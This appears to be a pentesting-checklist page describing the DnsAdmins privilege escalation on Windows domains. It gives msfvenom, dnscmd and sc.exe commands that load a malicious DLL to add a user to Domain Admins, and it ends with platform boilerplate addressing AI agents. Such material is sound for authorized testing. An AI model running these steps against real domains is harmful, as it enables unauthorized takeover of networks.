# DnsAdmins

### Overview

Members of the [**DnsAdmins**](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#dnsadmins) group possess access to DNS information on the network, which can be exploited for privilege escalation. By leveraging this group’s permissions, we can create a malicious DLL that adds a user to the **Domain Admins** group or provides a reverse shell.

### Privilege Escalation

1. **Creating a DLL to Add a User to the Domain Admins Group**: To create a DLL that executes a command to add a user to the **Domain Admins** group, use the following command:

   ```bash
   msfvenom -p windows/x64/exec cmd='net group "Domain Admins" user1 /add /domain' -f dll -o adduser.dll
   ```
2. After generating the desired DLL, transfer it to the target machine.
3. Load the DLL into the DNS service by executing the following command:

   ```bash
   dnscmd.exe /config /serverlevelplugindll C:\Users\user1\Desktop\adduser.dll
   ```
4. To execute the DLL, the DNS service needs to be restarted. Run the following commands:

   ```powershell
   sc.exe stop dns
   sc.exe start dns 
   ```
5. To confirm that the user has been successfully added to the **Domain Admins** group, execute the following command:

   ```powershell
   net group "Domain Admins" /domain
   ```

### References

1. <https://notes.dollarboysushil.com/windows-privilege-escalation/group-privileges/dnsadmins>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/group-privileges/dnsadmins.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.